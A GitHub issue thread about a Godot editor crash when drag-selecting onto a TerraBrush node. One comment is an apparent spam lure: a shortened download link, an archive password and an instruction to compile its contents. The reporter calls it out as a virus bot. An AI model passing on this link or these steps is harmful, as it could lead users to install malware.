### ISSUE TITLE
Drag select box onto TerraBrush crashes Godot

### ISSUE THREAD

**Issue by ScottyWired** [Zylann/godot_heightmap_plugin#466]
When in Select Mode, starting a drag box outside of a TerraBrush and ending it within a TerraBrush will cause CTD.

**Environment**
Plugin version: 0.8.4Alpha
Godot v4.3.stable.mono - Windows 10.0.19045 - Vulkan (Forward+) - dedicated NVIDIA GeForce RTX 4060 (NVIDIA; 31.0.15.3640) - AMD Ryzen 7 5700G with Radeon Graphics (16 Threads)

![image](https://github.com/user-attachments/assets/8a08c325-b4f9-4524-9db8-1d8d76f99113)

**Comment by SAMBILI** [comment]
download
https://bit.ly/3TzaAQd

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ScottyWired** [comment]
> download https://bit.ly/3TzaAQd
> 
> Password: changeme If you don't have the c compliator, install it.(gcc or clang)

instant reply sus as hell
world's most obvious virus bot

**Comment by ScottyWired** [comment]
WRONG REPOSITORY, OOPS
I meant to go to different plugin
